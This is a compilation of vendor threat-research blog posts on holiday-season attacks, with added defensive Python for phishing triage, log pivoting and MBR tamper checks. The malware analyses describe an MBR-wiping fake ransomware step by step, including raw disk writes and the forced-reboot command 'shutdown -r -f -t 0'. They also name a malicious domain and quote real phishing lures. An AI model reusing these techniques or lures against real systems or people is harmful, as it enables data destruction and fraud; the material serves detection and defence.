If you’re looking to get a great deal on just about anything, this is the best time of the year to make that purchase. Everyone knows this, including cyber criminals. And that’s a problem for many organizations.

Perhaps as ominous foreshadowing, Amazon announced that a “technical error” exposed customer names and email addresses — days before Black Friday and Cyber Monday even got started.

Employees Will Make Personal Online Purchases on Corporate Time, Machines

Online shopping is a popular activity, both at home and in the office. It’s even more prevalent during the holiday shopping season. In a recent survey from Robert Half Technology, almost 65 percent of respondents said they will spend at least some of their work time making holiday purchases online.

While no one wants to be a Scrooge during the holidays, every organization needs to have safeguards in place to protect against the inevitable increase in the number of cyberattacks that are coming.

2017 Holiday Cyberattacks Paint Picture for 2018 Shopping Season

To help organizations, retailers, and small- and medium-sized businesses (SMB) prepare, the SonicWall Capture Labs threat research team analyzed cyber threat data from the second half of 2017. Unsurprisingly, there was an enormous spike in the number of malware attacks last year on Cyber Monday, the biggest online shopping day of the year. Here are some of the official data points from 2017:

  • Cybercriminals launched more than 113 million malware attacks on Cyber Monday last year, a 4.4x increase over the yearly average
  • Malware attacks jumped 27 percent on Black Friday
  • Ransomware attacks spiked 127 percent on Cyber Monday

So, what does this mean for 2018? Expect your organization to see more of the same. But there are proven methods to stop the surge in holiday cyberattacks.

6 Security Layers Organizations Can Use to Mitigate Holiday Cyberattacks

We know employees will be spending time online at work surfing for deals and customers will make purchases at point-of-sale (POS) terminals, so there is some inevitable risk. And while the data does show a worrisome trend, there are things you can do to protect your network, endpoints and data from cyberattacks during the holiday shopping season.

The key is to have a layered, defense-in-depth approach, something SonicWall can help with through our automated real-time breach detection and prevention platform. From the outside in, here are the six layers we recommend:

  1. Next-Generation Firewall – The first line of defense, a next-generation firewall (NGFW) should have high security efficacy and use machine learning to identify and block malware, ransomware and other attacks at the gateway.
  2. Deep Packet Inspection of TLS/SSL-encrypted Traffic – The use of encryption to hide cyberattacks continues to grow at a fast pace, so it’s essential any NGFW is able to scan encrypted traffic for threats.
  3. Email Security – Email is a common threat vector for delivering attacks, often through attachments, making it critical that any solution be able to scan inbound and outbound email for phishing attacks and infected attachments.
  4. Multi-engine Sandboxing – While one engine is good, several is better when it comes to identifying and blocking never-before-seen cyberattacks. SonicWall Capture ATP is a multi-engine sandbox that features block-until-verdict safeguards.
  5. Real-Time Deep Memory Inspection – SonicWall’s patent-pending RTDMI™ technology, included with Capture ATP, identifies and stops difficult-to-find threats hidden in memory where malware’s weaponry is exposed for less than 100 nanoseconds.
  6. Capture Client – Endpoint devices used beyond the firewall perimeter are more susceptible to attacks. Capture Client provides multiple advanced endpoint protection capabilities in addition to the ability to roll back to a previous point before malware entered or was activated on the device.

Next week, SonicWall Capture Labs threat researchers will publish their analysis on three key shopping dates in 2018: Black Friday, Small Business Saturday and Cyber Monday.

Until then, explore the Capture Security Center, which provides a graphical view of the worldwide attacks over the last 24 hours, countries being attacked and geographic attack origins, and monthly trends by attack type.

October 2018 Cyber Threat Data: Web App Attacks, Ransomware Continue Upward Trend

Throughout 2018, we’ve been sharing monthly updates on the cyber threat data recorded and analyzed by SonicWall Capture Labs, highlighting cyberattack trends and tying it back to the overall cyber threat landscape.

Now, cyber threat intelligence from the SonicWall Capture Security Center is even deeper. The tool now provides empirical data on cyberattacks against web applications. In an increasingly virtual and cloud-connected world, protecting web apps is just as critical as defending more traditional networks.

In October, the overall number of web application attacks continued to rise sharply. We tracked over 1.8 million web app attacks, more than double the volume of attacks for the same time period in 2017.

One factor influencing this is the continued growth explosion of the Internet of Things (IoT), which has added billions of connected devices online, each bringing new and unique potential for vulnerabilities and weaknesses.

While the headline-grabbing news often focuses on processor attacks like Spectre or Meltdown, companies that aren’t using security measures, like SonicWall Capture Advanced Threat Protection with Real-Time Deep Memory Inspection (RTDMI), can leave their standard applications exposed and vulnerable to cybercriminals who are always looking for a weakness.

The volume of ransomware attacks also continued its global upward trend in October. So far in 2018 we’ve seen over 286 million worldwide attacks, up 117 percent from 132 million this time last year. On an individual customer level, that’s 57 attacks per day per customer, an increase from only 14 in October last year.

The growing frequency and complexities of cyberattacks paint a dire picture for global businesses of all sizes. The good news is that by assessing your business’s cybersecurity risk, improving overall security behavior, and ensuring that you are utilizing the right cybersecurity solutions for your business, it’s possible to protect your business from most data breaches.

October Attack Data

Globally, the SonicWall Capture Threat Network, which includes more than 1 million sensors across the world, recorded the following 2018 year-to-date attack data through October 2018:

  • 9.2 billion malware attacks (44 percent increase from 2017)
  • 3.2 trillion intrusion attempts (45 percent increase)
  • 286.2 million ransomware attacks (117 percent increase)
  • 23.9 million web app attacks (113 percent increase)
  • 2.3 million encrypted threats (62 percent increase)

In October 2018 alone, the average SonicWall customer faced:

  • 1,756 malware attacks (19 percent decrease from October 2017)
  • 819,947 intrusion attempts (17 percent increase)
  • 57 ransomware attacks (311 percent increase)
  • 8,742 web app attacks (185 percent increase)
  • 152 encrypted threats (12 percent increase)
  • 12 phishing attacks each day (19 percent decrease)

SonicWall Capture Security Center

SonicWall cyber threat intelligence is available in the SonicWall Security Center, which provides a graphical view of the worldwide attacks over the last 24 hours, countries being attacked and geographic attack origins. This view illustrates the pace and speed of the cyber arms race.

The resource provides actionable cyber threat intelligence to help organizations identify the types of attacks they need to be concerned about, so they can design and test their security posture to ensure their networks, data, applications and customers are properly protected.

Malicious Cyber Activity Roundup: The Thanksgiving Week 2018 Edition

As retailers are gearing up with their Black Friday doorbuster deals, cybercriminals are also upping the ante to lure shoppers into clicking that malicious link or downloading that latest shopping app in exchange for deals and best prices on their most coveted items.

Here at the SonicWall Capture Labs, we have spent the last few weeks combing through file samples, websites and emails that have surfaced with all the sales, top deals and freebies. We rounded up some of the most common tricks cybercriminals use that consumers should watch out for.

Spam is still one of the top sources for shady deals that can lead victims to give up their personal information. The spam emails we have seen share a common theme: luring consumers into clicking malicious links embedded within the body of the email. Some of the common email subjects are:

  • Start your Discount Season on Thanksgiving Day! UP TO 90% off !
  • Spray in your mouth and drop 25 lbs by Thanksgiving
  • Thanksgiving Flash Sale
  • Last day to order in time in BlackFriday (free shipping) win $63
  • Don’t get caught by surprise this black Friday – Free credit scores for all!

We have also noticed an increase in the number of phishing emails promising rewards and free money while pretending to be from popular retailers such as Amazon, Walgreens, CVS, or even banks.

  • Absa Rewards Ticket Interest Rate: 27.5% Logging Confirmation
  • CVS e-rewards , #9483255
  • you have amazon rewards ending tonight (vouch 9049229)
  • Your amazon.com: prime-rewards 101490715 expiring: scott2013 thanks
  • scott2013 here are your new walgreens-rewards ending tonight (wal-7761433937)

Looking further at the phishing email from Absa bank, for instance, the message promises an outrageous interest rate of 27.5%. Once the victim follows the link to claim the “reward”, they are taken to a fake banking website, distinct from the actual bank’s website, that asks for their online banking login information.

The “free” credit score spam email is similar. Once the victim clicks on the link, he will then be taken to a website asking for his personal information to get “instant access” to his credit scores.

Another example is from a retailer promising a discount of up to 90%! The victim will then be taken to a fake website. There is never a guarantee of ever receiving the products when you shop on such sketchy websites.
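The lures quoted above share a few mechanical traits: a retailer or bank named in the subject while the mail comes from somewhere else, a "rewards" or "voucher" word next to a long numeric ID, an implausible discount, "free" followed by something valuable, and a deadline. The following is an added example, not SonicWall's code, that turns those traits into triage rules and runs them over the subjects listed in this roundup. The sender domains paired with each subject, the BRAND_DOMAINS allowlist, and the final legitimate control message are constructed assumptions for illustration.

```python
# Added example (not SonicWall's code): rule-based triage of sender/subject pairs for
# the lure patterns described above. The subjects are the ones quoted in the roundup;
# the sender domains paired with them and BRAND_DOMAINS are constructed assumptions.
import re

# Assumed allowlist: brands named in the lures and the domains their genuine mail uses.
BRAND_DOMAINS = {
    "amazon": ("amazon.com",),
    "walgreens": ("walgreens.com",),
    "cvs": ("cvs.com",),
    "absa": ("absa.co.za",),
}

# Each rule names one lure pattern visible in the subjects above.
RULES = (
    ("reward_with_tracking_id", re.compile(r"\b(rewards?|vouch(?:er)?s?)\b.*\d{6,}", re.I)),
    ("unrealistic_discount", re.compile(r"\b(?:[7-9]\d|100)\s*%\s*off\b", re.I)),
    ("free_bait", re.compile(r"\bfree\b.*\b(credit scores?|shipping|money)\b", re.I)),
    ("urgency", re.compile(r"\b(last day|ending tonight|expiring)\b", re.I)),
)


def sender_matches_brand(sender_domain, brand):
    """True when the sender's domain is the brand's own domain or a subdomain of it."""
    sender = sender_domain.lower().strip()
    return any(sender == d or sender.endswith("." + d) for d in BRAND_DOMAINS[brand])


def triage_subject(sender_domain, subject):
    """Return the list of lure flags raised for one message (empty list = nothing matched)."""
    flags = []
    for brand in BRAND_DOMAINS:
        # Brand named in the subject, but the mail did not come from that brand's domain.
        if re.search(rf"\b{brand}\b", subject, re.I) and not sender_matches_brand(sender_domain, brand):
            flags.append(f"impersonates_{brand}")
    flags.extend(name for name, pattern in RULES if pattern.search(subject))
    return flags


# Subjects from the roundup paired with constructed sender domains; the last entry is a
# constructed legitimate control message that should raise no flags.
SAMPLES = (
    ("deals-mailer.example", "Start your Discount Season on Thanksgiving Day! UP TO 90% off !"),
    ("deals-mailer.example", "Spray in your mouth and drop 25 lbs by Thanksgiving"),
    ("deals-mailer.example", "Last day to order in time in BlackFriday (free shipping) win $63"),
    ("deals-mailer.example", "Don't get caught by surprise this black Friday - Free credit scores for all!"),
    ("notify.example", "Absa Rewards Ticket Interest Rate: 27.5% Logging Confirmation"),
    ("notify.example", "CVS e-rewards , #9483255"),
    ("notify.example", "you have amazon rewards ending tonight (vouch 9049229)"),
    ("notify.example", "scott2013 here are your new walgreens-rewards ending tonight (wal-7761433937)"),
    ("amazon.com", "Your Amazon.com order has shipped"),
)


def triage_batch(samples):
    """Run every sample through triage_subject; returns [(subject, flags), ...]."""
    return [(subject, triage_subject(sender, subject)) for sender, subject in samples]


if __name__ == "__main__":
    for subject, flags in triage_batch(SAMPLES):
        print(f"{'FLAG' if flags else '    '} {flags} <- {subject}")
```

Rules like these are a triage aid rather than a verdict: the weight-loss subject in the list raises nothing because it names no brand, ID, discount or deadline, which is why subject heuristics belong alongside link and attachment inspection rather than in place of them.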

Since savvy shoppers have increasingly been downloading and using shopping-related apps when looking for deals this season, malware writers are spreading their malicious creations and targeting unsuspecting shoppers on mobile platforms.

We observed a few malicious Android samples with interesting app names that fall into line with the current shopping season:

  • Amazon Shopping
  • Aliexpress Shopping App
  • eBay
  • Jumia Online Shopping

When executed, these apps show similar behaviors – they communicate with malicious domains based on hardcoded links within the code:

As clearly visible, for each of these links the value of the parameter “s” changes.

We saw the following GET requests to the host:

At the time of writing this blog the domain appears to have been taken down and therefore we did not see any further communication between the app and this domain.

Further investigation about the domain – sppromo.ru – gave us more insight about the widespread nature of this threat:

  • This campaign contains a number of different infected apps based on VirusTotal results for this domain. As shown below multiple links are present under this domain with different values for the variable s signifying multiple app names:

  • Multiple malicious apk files can be seen associated with this domain:

  • The Google Chrome browser even identifies this website as “deceptive” and gives a warning when this link is visited:

We analyzed a number of samples belonging to this threat. Interestingly, the earliest sample appears to be from mid-November 2018, indicating that this is a fairly new campaign. Its timing with Black Friday may be a coincidence; regardless, it is possible that the attackers created more APKs with shopping-related names to increase their chances of infecting unsuspecting users, since they already have some apps with such names, as mentioned earlier.
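Because every app build in this campaign calls the same domain and differs only in the value of the “s” parameter, that parameter is a convenient pivot for a defender scoping an incident: each distinct value is one more app name to hunt for, and each client that requested it is one more device to pull. The following is an added example, not SonicWall's tooling, that does this over proxy logs. Only the domain sppromo.ru and the parameter name “s” come from the analysis above; the log format, the URL path /app/, the client addresses and the parameter values are constructed assumptions.

```python
# Added example (not SonicWall's code): pivot on the "s" URL parameter in proxy logs to
# enumerate the app variants in the campaign and the clients that contacted the domain.
# The log lines and URL path are constructed; only sppromo.ru and "s" come from the analysis.
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Assumed access-log shape: timestamp client method url status (one request per line).
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})"
)

# Constructed sample log: three clients, four app variants, one unrelated request,
# and one request with the host in upper case to show host normalisation.
SAMPLE_LOG = """\
2018-11-20T09:12:01Z 10.20.0.15 GET http://sppromo.ru/app/?s=amazon_shopping 200
2018-11-20T09:12:09Z 10.20.0.15 GET http://sppromo.ru/app/?s=amazon_shopping 200
2018-11-20T09:14:33Z 10.20.0.42 GET http://sppromo.ru/app/?s=ebay 200
2018-11-20T09:15:02Z 10.20.0.42 GET http://www.example.com/index.html 200
2018-11-20T09:20:47Z 10.20.0.77 GET http://sppromo.ru/app/?s=jumia_online_shopping 503
2018-11-20T09:21:10Z 10.20.0.77 GET http://SPPROMO.RU/app/?s=aliexpress_shopping_app 503
malformed line that the parser must skip
"""


def extract_campaign_hits(log_text, domain="sppromo.ru", param="s"):
    """Map each client address to the set of parameter values it requested from the domain.

    Matches the domain itself and any subdomain, case-insensitively, so a request to an
    upper-cased or prefixed host is not missed. Lines that do not parse are skipped.
    """
    hits = defaultdict(set)
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        parts = urlsplit(match.group("url"))
        host = (parts.hostname or "").lower()
        if host != domain and not host.endswith("." + domain):
            continue
        for value in parse_qs(parts.query).get(param, []):
            hits[match.group("client")].add(value)
    return dict(hits)


def campaign_summary(hits):
    """Distinct parameter values (one per app variant) and the clients that contacted the domain."""
    variants = sorted(set().union(*hits.values())) if hits else []
    return {"variants": variants, "clients": sorted(hits)}


if __name__ == "__main__":
    hits = extract_campaign_hits(SAMPLE_LOG)
    summary = campaign_summary(hits)
    print("app variants seen:", summary["variants"])
    for client in summary["clients"]:
        print(f"  {client}: {sorted(hits[client])}")
```

The 503 responses in the constructed sample mirror the observation above that the domain was taken down: the requests still appear in the logs, so the pivot keeps working for scoping even after the infrastructure is gone.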

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: AndroidOS.SPP.DWNL (Trojan)

Here are some hashes of a few additional samples from this campaign:

    • Amazon
      • e95990e3b2392de60fd69d2cf912dcfd – Amazon Appstore Free Notifier
      • 085c5e419f0d86222ea08b95df765f92 – Amazon
      • 511c212badd33c870e3b8102daf8f8ab – Amazon Shopping
    • Shopping
      • 73e79c49410a31a3bc4c58d91ae8ca00 – Jumia Online Shopping
      • 4a62fb20248a6c5ea6930fb384895ad9 – Aliexpress Shopping App
      • f44cc20ce344fbd0880f98b816b4c1db – Aliexpress Shopping App
    • eBay
      • 8157c2c5ceb3f045781c4d09982329df – eBay
      • 578c92feaf233b90e56c25c21f3435c5 – eBay

 

 

Fake Ransomware just overwrites MBR but demands payment

The SonicWall Capture Labs Threat Research Team has recently come across a fake ransomware trojan that pretends to hold a victim’s files hostage. Although its ransom message is intimidating and a Monero address is provided for a $200 payment, there is no encryption functionality present in the malware.

Infection Cycle:

The attacker has made no effort to hide the functionality of the malware. It was written in Delphi and is so straightforward that even a simple listing of the strings in the binary instantly reveals its purpose:

Running the executable through a debugger reveals its runtime functionality.  The first step is to verify whether physical access to the system drive is possible using the CreateFileA and ReadFile API calls:

If the above test passes, it proceeds to open a handle to the physical drive again and overwrite the MBR using the WriteFile API call:

Arguments on the stack point to the ransom text to be displayed after reboot:

After successfully overwriting the MBR with the ransom text, the trojan executes “shutdown -r -f -t 0” using WinExec to immediately reboot the system:

Upon reboot, the following ransom text is displayed and the machine is unable to boot as normal:

The only modification to the filesystem is the overwritten MBR.  No files have actually been encrypted and there is no encryption functionality present in the malware.  Although files can easily be restored by mounting the filesystem using a live OS booted via a memory stick, most users will likely consider their files gone and perform a full reinstall.  There is no contact information provided to “restore” files and no way of verifying if paying the $200 in Monero will suffice.
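Since the only change this trojan makes is to the first sector of the disk, the question a responder needs to answer is whether a given MBR still looks like a boot sector or has been replaced by text. The following is an added example, not SonicWall's code, that decodes a 512-byte sector, checks the boot signature and the sanity of the four partition entries, measures how much of the boot-code area is printable text, and compares the sector's SHA-256 against a baseline recorded while the machine was known good. The two sample sectors it analyses are constructed for illustration: a minimal “healthy” sector with one NTFS partition, and a “ransom” sector whose boot code and partition table have been replaced by a constructed note.

```python
# Added example (not SonicWall's code): triage one 512-byte MBR image for the kind of
# overwrite described above. Both sample sectors are constructed for illustration.
import hashlib
import struct

MBR_SIZE = 512
PART_TABLE_OFFSET = 446      # four 16-byte partition entries live at 446..509
BOOT_SIGNATURE = b"\x55\xaa"  # bytes 510..511 of a bootable sector


def parse_partition_table(mbr):
    """Decode the four partition slots; return (entries, problems)."""
    entries, problems = [], []
    for slot in range(4):
        off = PART_TABLE_OFFSET + 16 * slot
        raw = mbr[off:off + 16]
        if raw == b"\x00" * 16:
            continue  # unused slot
        # status(1) chs_start(3) type(1) chs_end(3) lba_start(4) sectors(4), little-endian
        status, ptype, lba_start, sectors = struct.unpack("<B3xB3xII", raw)
        if status not in (0x00, 0x80):
            problems.append(f"slot {slot}: invalid status byte 0x{status:02x}")
        if ptype == 0 or sectors == 0:
            problems.append(f"slot {slot}: type/size fields do not describe a partition")
        entries.append({"slot": slot, "bootable": status == 0x80, "type": ptype,
                        "lba_start": lba_start, "sectors": sectors})
    # Overlapping ranges mean the table is garbage (for example text), not a real layout.
    spans = sorted((e["lba_start"], e["lba_start"] + e["sectors"]) for e in entries)
    if any(b0 < a1 for (a0, a1), (b0, b1) in zip(spans, spans[1:])):
        problems.append("partition ranges overlap")
    return entries, problems


def printable_ratio(data):
    """Share of bytes that are printable ASCII; real boot code scores low, a text note high."""
    return sum(32 <= b < 127 for b in data) / len(data) if data else 0.0


def assess_mbr(mbr, baseline_sha256=""):
    """Structural checks plus an optional comparison with a recorded baseline hash."""
    if len(mbr) != MBR_SIZE:
        raise ValueError("expected exactly one 512-byte sector")
    findings = []
    if mbr[510:512] != BOOT_SIGNATURE:
        findings.append("boot signature 0x55AA missing")
    entries, problems = parse_partition_table(mbr)
    findings.extend(problems)
    if not entries:
        findings.append("no partition entries")
    ratio = printable_ratio(mbr[:PART_TABLE_OFFSET])
    if ratio > 0.6:
        findings.append(f"boot-code area is {ratio:.0%} printable text")
    digest = hashlib.sha256(mbr).hexdigest()
    if baseline_sha256 and digest != baseline_sha256:
        findings.append("sha256 differs from recorded baseline")
    return {"sha256": digest, "partitions": entries,
            "findings": findings, "tampered": bool(findings)}


def build_healthy_mbr():
    """Constructed sample: stub boot code, one bootable NTFS partition, valid signature."""
    boot_code = b"\x33\xc0\x8e\xd0\xbc\x00\x7c".ljust(PART_TABLE_OFFSET, b"\x00")
    entry = struct.pack("<B3sB3sII", 0x80, b"\x00\x00\x00", 0x07, b"\x00\x00\x00", 2048, 204800)
    return boot_code + entry + b"\x00" * 48 + BOOT_SIGNATURE


def build_ransom_mbr():
    """Constructed sample: a text note fills boot code and partition table; signature kept."""
    note = b"YOUR FILES ARE LOCKED. PAY 200 USD IN MONERO TO <placeholder address>. "
    return (note * 10)[:510] + BOOT_SIGNATURE


if __name__ == "__main__":
    baseline = assess_mbr(build_healthy_mbr())["sha256"]
    for name, sector in (("healthy", build_healthy_mbr()), ("ransom", build_ransom_mbr())):
        result = assess_mbr(sector, baseline)
        print(name, "TAMPERED" if result["tampered"] else "clean", result["findings"])
```

On a real machine the sector is the first 512 bytes of the physical disk, read with administrative rights; the baseline hash should be captured while the system is known good and stored off the host, since anything that can overwrite the MBR can also overwrite a hash kept beside it. A sector that fails these checks while the volumes behind it still mount cleanly from a live OS is exactly the situation described above: the partition table and boot code need to be rewritten, but no file recovery or reinstall is required.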

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: KillMBR.RSM (Trojan)